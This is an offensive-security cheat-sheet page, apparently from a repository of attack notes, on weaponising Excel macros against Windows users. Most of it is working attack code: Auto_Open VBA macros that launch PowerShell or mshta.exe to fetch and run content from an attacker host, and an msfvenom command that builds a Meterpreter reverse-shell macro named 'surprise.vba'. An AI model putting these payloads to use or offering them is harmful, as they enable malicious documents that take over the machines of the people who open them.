killchain-compendium/exploit/windows/macros/macros.md

39 lines
743 B
Markdown
Raw Normal View History

2022-04-14 01:06:16 +02:00
# Macros
* Executes after user clicks enable content
* Open Excel
* View --> Macros --> Create New Macros
```c
Sub HelloWorld()
PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://%ATTACKER_IP%/passwd -OutFile C:\passwd", vbNormalFocus)
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
## Meterpreter
* Directly execute shell without user interaction
* Configure and run `use windows/misc/hta_server`
* Macro executes `mshta.exe`
```c
Sub HelloWorld()
PID = Shell("mshta.exe https://%ATTACKER_IP%:8080/c9496fz.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
## Msfvenom
* Create reverse shell via
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f vba -o surprise.vba
```